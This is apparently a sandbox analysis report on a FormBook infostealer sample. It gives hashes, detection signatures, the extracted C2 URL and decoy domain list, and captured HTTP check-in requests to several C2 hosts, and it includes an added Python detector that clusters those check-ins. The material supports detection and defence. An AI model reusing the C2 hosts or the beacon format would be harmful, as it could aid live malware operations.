Analysis Report PO45937008ADENGY.exe

Overview

General Information

Sample Name: PO45937008ADENGY.exe
Analysis ID: 383974
MD5: 47ebf3893d8d6db4add1b87ad75495e4
SHA1: a90970359da16dfbcf89648f7a38fb75707181b3
SHA256: ee54b187c42f159bfba469c4b8c5ba0a85afeb802ea7eacaf400ccb38f7183af
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.hnchotels.com/mb7q/"], "decoy": ["thezensub.com", "wapedir.com", "itt.xyz", "mindframediscovery.com", "sitesolved.net", "beyju.store", "belatopapparel.xyz", "ridgefitct.com", "huanb.com", "brustwarzentattoo.com", "jlasoluciones.club", "sinoagrifcf.com", "theskineditco.com", "ccsdinstructer.com", "wealththinker.com", "pradnyanamaya.com", "szmsbk.com", "meezingo.com", "ivyshermanboutique.com", "tkbeads.com", "network70.com", "viralofilia.com", "eversteve.com", "softballlyfe.com", "fashionpulos.com", "myfashionest.com", "thelandcle.com", "xuuxacademy.com", "shopbijousecrets.com", "ynlklwsx.icu", "mtasa.blue", "covid19officers.com", "bookitstaugustine.com", "kuppers.info", "therapeuticsmile.com", "bestsocialprograms.com", "alergiaalfrio.com", "hepimizdostuz.com", "shubharambh-gifts.com", "drmellilo.com", "visaad.com", "caseysisters.com", "accessibleageing.com", "tokoryan.online", "databasement.net", "penstockdistillery.com", "payelll.com", "rockinghampress.com", "tuyensinhhaiphong.com", "myrecordsinfo.com", "thegarnetts.vegas", "veganktichen.com", "helpmewithmyenergy.com", "tootywooty.com", "walmartadvisors.com", "atrangii.com", "sceantez.com", "namigwe.art", "davidkellywvhouse6.com", "richardyg.com", "pasouth.com", "theblockparq.com", "merkuryindustries.com", "solidgroundsministries.com"]}
Multi AV Scanner detection for submitted file
Source: PO45937008ADENGY.exe Virustotal: Detection: 27%
Source: PO45937008ADENGY.exe ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PO45937008ADENGY.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.4:49727 version: TLS 1.0
Source: PO45937008ADENGY.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 4x nop then pop esi 9_2_00415836
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 4x nop then pop edi 9_2_0040C3E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop edi 17_2_02EDC3E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 4x nop then pop esi 17_2_02EE5836

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 185.199.108.153:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 52.15.160.167:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 81.88.57.70:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 85.17.172.1:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 123.31.43.181:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.hnchotels.com/mb7q/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.belatopapparel.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: myliverpoolnews.cf | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1 | Host: www.pradnyanamaya.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=LCdox3MSFrqgB2UnRRxcW6IJzj2SaKpVJDnxyOZjgJWO5AYJJIYTqL+jJlLhwAlefZ0q&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.hepimizdostuz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1 | Host: www.hnchotels.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=Eg9LmWGI0Oet516AxmsZzIGWmok4sinlIPDI718HGBMEwpQyo+2kUwjDddaGIg2fHcAS&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.bookitstaugustine.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=wg6/7HKVKbWyxm3ocgI2qQ4ybtWVQQxygyNCKw3F9tUQ2TQ7UscRDkS2j2ufAGdI66vr HTTP/1.1 | Host: www.beyju.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.szmsbk.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.szmsbk.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=sq+DyRr6NuP6fKntU6mt8VYgVZP7tC1pT82Xrdht1pAEghqPgbO+4msYNeCB8xB+bsnr HTTP/1.1 | Host: www.accessibleageing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.theskineditco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=icy9hz7ZIr7yHvDFY6JKJS3opDpdp14zNZwv94Uz6fKXYU2e142cjQElnIAagsV1qBmU&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.thelandcle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ HTTP/1.1 | Host: www.tuyensinhhaiphong.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.merkuryindustries.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1 | Host: www.belatopapparel.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl HTTP/1.1 | Host: www.helpmewithmyenergy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic HTTP traffic detected: GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=ldDnDUdezTC7tPBp0C9FWPT+aIOp+kECAuOoWXdVRcKkjwO3/Dyrm4T044WIDM2icpCp HTTP/1.1 | Host: www.softballlyfe.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
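The check-ins listed above share a structure that survives the per-build changes in path and parameter names: a GET to a short single-segment path, two query parameters of which one short token (1bhta6=SXxhAn0Xl) is identical on every host and the other is a long base64-looking blob, no User-Agent, Connection: close, and a seven-byte all-zero body. The Python below is an added example, not part of the Joe Sandbox report and not FormBook code, that flags requests by that structure and groups them by the constant token. It uses a few of the requests above as sample input; the length bounds in the regular expressions and the benign request to example.invalid are assumptions made for this example.

```python
"""Structural detector for FormBook-style HTTP check-ins (added example)."""
import re
from collections import defaultdict

# Traits shared by every check-in in the report: GET to a short single-segment
# path, exactly two query parameters (one short token that is identical on every
# host, one long base64-looking blob), no User-Agent, "Connection: close", and a
# body of null bytes on a GET. The length bounds are assumptions for this example.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{6,16}$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def split_query(query):
    """Split 'k=v&k2=v2' without URL-decoding, so '+' and '/' in the blob survive."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def classify(request_line, headers, body=b""):
    """Return the constant token if the request looks like a check-in, else None."""
    method, _, rest = request_line.partition(" ")
    target = rest.rsplit(" ", 1)[0]          # strip the trailing "HTTP/1.1"
    path, _, query = target.partition("?")
    if method != "GET" or not PATH_RE.match(path):
        return None
    values = [v for _, v in split_query(query)]
    if len(values) != 2:
        return None
    tokens = [v for v in values if TOKEN_RE.match(v)]
    blobs = [v for v in values if BLOB_RE.match(v)]
    if len(tokens) != 1 or len(blobs) != 1:
        return None
    lowered = {k.lower(): v.lower() for k, v in headers.items()}
    if "user-agent" in lowered or lowered.get("connection") != "close":
        return None
    if body.strip(b"\x00"):                  # a GET body is tolerated only if all zeros
        return None
    return tokens[0]


def cluster(requests):
    """Group flagged requests by token -> sorted host list (one entry per campaign build)."""
    by_token = defaultdict(set)
    for host, line, headers, body in requests:
        token = classify(line, headers, body)
        if token:
            by_token[token].add(host)
    return {t: sorted(h) for t, h in by_token.items()}


NULL7 = b"\x00" * 7
CLOSE = {"Connection": "close"}
# Sample input: four check-ins and the decoy page fetch copied from the report,
# plus one constructed benign request (not from the report) to show a miss.
SAMPLE_REQUESTS = [
    ("www.pradnyanamaya.com",
     "GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1",
     CLOSE, NULL7),
    ("www.hnchotels.com",
     "GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=XnfwGhrIr5kaKJKvTcoJuAoUfO0x4eHAt94m/ubvkhYI6FHew8DVehMKtseK8ovgeTRA HTTP/1.1",
     CLOSE, NULL7),
    ("www.szmsbk.com",
     "GET /mb7q/?yN60IZO0=T8TVcCFgcIrhStyi5i6/EXaR/HpYKREHKQCvv+FQFJF/Ia03IxQCcucp8NSYf6PmMrz3&1bhta6=SXxhAn0Xl HTTP/1.1",
     CLOSE, NULL7),
    ("www.belatopapparel.xyz",
     "GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1",
     CLOSE, NULL7),
    ("myliverpoolnews.cf",
     "GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1",
     {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", "Connection": "Keep-Alive"}, b""),
    ("example.invalid",                      # constructed, not from the report
     "GET /api/?id=abcdef123&sig=" + "A" * 48 + " HTTP/1.1",
     {"User-Agent": "curl/7.68.0", "Connection": "close"}, b""),
]

if __name__ == "__main__":
    for token, hosts in cluster(SAMPLE_REQUESTS).items():
        print(f"token {token}: {len(hosts)} hosts -> {', '.join(hosts)}")
```

Keying on structure rather than on the literal /mb7q/ matters here because the configuration extractor reports a single URL (www.hnchotels.com/mb7q/) while the capture shows the same check-in sent to fifteen different hosts; grouping by the constant token keeps that whole set together as one campaign. The first request in the list, the page fetch from myliverpoolnews.cf, carries a User-Agent and keep-alive, so the example does not flag it. Two-parameter GETs without a User-Agent also occur in legitimate automation, so tune the length bounds against your own traffic before using this as more than a hunting query.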
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.150.212
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: PEGTECHINCUS
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVNPTCorpVN
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.4:49727 version: TLS 1.0
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
Source: unknown DNS traffic detected: queries for: myliverpoolnews.cf
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 08 Apr 2021 11:31:12 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
